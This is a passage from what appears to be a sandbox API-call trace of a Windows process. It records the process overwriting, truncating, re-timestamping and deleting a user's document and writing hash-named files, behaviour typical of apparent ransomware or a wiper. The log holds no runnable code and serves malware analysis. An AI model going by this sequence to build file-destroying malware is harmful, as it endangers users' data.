lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.552] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.552] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.552] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.552] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.552] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.552] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.552] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.553] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.553] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.553] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.553] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0xe0, lpOverlapped=0x0) returned 1 [0076.553] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.553] CloseHandle (hObject=0x36c) returned 1 [0076.555] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC.info", lpFilePart=0x0) returned 0x56 [0076.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\d8d96e2e7400fa671e2de5900b4a63dc.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.555] GetFileType (hFile=0x36c) returned 0x1 [0076.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.555] GetFileType (hFile=0x36c) returned 0x1 [0076.555] WriteFile (in: hFile=0x36c, lpBuffer=0x21fed20*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x21fed20*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.556] CloseHandle (hObject=0x36c) returned 1 [0076.557] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.557] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wbzyg9ebyngvebzsg4.odt"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711932f0, ftCreationTime.dwHighDateTime=0x1d4cbab, ftLastAccessTime.dwLowDateTime=0x91f72e80, ftLastAccessTime.dwHighDateTime=0x1d4ce78, ftLastWriteTime.dwLowDateTime=0x91f72e80, ftLastWriteTime.dwHighDateTime=0x1d4ce78, nFileSizeHigh=0x0, nFileSizeLow=0x140d6)) returned 1 [0076.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.557] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.557] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", dwFileAttributes=0x80) returned 1 [0076.557] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.557] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wbzyg9ebyngvebzsg4.odt"), fInfoLevelId=0x0, lpFileInformation=0x2206948 | out: lpFileInformation=0x2206948*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x711932f0, ftCreationTime.dwHighDateTime=0x1d4cbab, ftLastAccessTime.dwLowDateTime=0x91f72e80, ftLastAccessTime.dwHighDateTime=0x1d4ce78, ftLastWriteTime.dwLowDateTime=0x91f72e80, ftLastWriteTime.dwHighDateTime=0x1d4ce78, nFileSizeHigh=0x0, nFileSizeLow=0x140d6)) returned 1 [0076.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.558] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wbzyg9ebyngvebzsg4.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.558] GetFileType (hFile=0x36c) returned 0x1 [0076.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.558] GetFileType (hFile=0x36c) returned 0x1 [0076.558] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.559] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.559] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.560] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.561] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.562] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.563] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.563] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.564] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.565] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.566] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.567] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.567] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.568] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.569] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.570] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.570] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.571] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.572] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.572] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.573] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.573] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x200, lpOverlapped=0x0) returned 1 [0076.573] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.574] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.575] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.576] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.576] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.577] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.578] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.579] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.579] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.586] WriteFile (in: hFile=0x36c, lpBuffer=0x2206e30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2206e30*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.588] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.589] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.589] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.589] SetEndOfFile (hFile=0x36c) returned 1 [0076.590] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.590] CloseHandle (hObject=0x36c) returned 1 [0076.591] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wbzyg9ebyngvebzsg4.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.591] GetFileType (hFile=0x36c) returned 0x1 [0076.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.591] GetFileType (hFile=0x36c) returned 0x1 [0076.591] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.591] CloseHandle (hObject=0x36c) returned 1 [0076.591] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wbzyg9ebyngvebzsg4.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.591] GetFileType (hFile=0x36c) returned 0x1 [0076.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.591] GetFileType (hFile=0x36c) returned 0x1 [0076.591] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wbzyg9ebyngvebzsg4.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.592] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.592] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wbzyg9ebyngvebzsg4.odt")) returned 1 [0076.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC", lpFilePart=0x0) returned 0x51 [0076.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\d8d96e2e7400fa671e2de5900b4a63dc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.593] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC", lpFilePart=0x0) returned 0x51 [0076.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\d8d96e2e7400fa671e2de5900b4a63dc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.594] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC", lpFilePart=0x0) returned 0x51 [0076.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC" (normalized: "c:\\users\\5p5nrgjn0js 